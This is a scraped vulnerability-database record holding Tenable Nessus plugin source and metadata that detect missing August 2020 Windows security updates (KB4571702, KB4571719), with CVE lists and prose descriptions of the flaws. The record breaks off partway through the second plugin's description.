The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139493);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1509\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1554\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1567\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571702\");\n script_xref(name:\"MSKB\", value:\"4571736\");\n script_xref(name:\"MSFT\", value:\"MS20-4571702\");\n script_xref(name:\"MSFT\", value:\"MS20-4571736\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", 
value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571702: Windows Server 2012 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571702\nor cumulative update 4571736. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. 
An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. 
An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n # https://support.microsoft.com/en-us/help/4571736/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0551e21\");\n # https://support.microsoft.com/en-us/help/4571702/windows-server-2012-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ece3db7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4571702 or Cumulative Update KB4571736.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571736',\n '4571702'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571736, 4571702])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:44", "description": "The remote Windows host is missing security update 4571719 or 
cumulative update 4571729. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1534)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. 
The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. 
(CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. 
The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571719: Windows 7 and Windows Server 2008 R2 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1489", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1534", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1552", "CVE-2020-1554", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1567", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_4571729.NASL", "href": "https://www.tenable.com/plugins/nessus/139491", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139491);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1489\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1529\",\n \"CVE-2020-1530\",\n \"CVE-2020-1534\",\n \"CVE-2020-1537\",\n \"CVE-2020-1538\",\n \"CVE-2020-1552\",\n \"CVE-2020-1554\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1567\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571719\");\n script_xref(name:\"MSKB\", value:\"4571729\");\n script_xref(name:\"MSFT\", value:\"MS20-4571719\");\n script_xref(name:\"MSFT\", value:\"MS20-4571729\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", 
value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571719: Windows 7 and Windows Server 2008 R2 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571719\nor cumulative update 4571729. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 
(CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. (CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. 
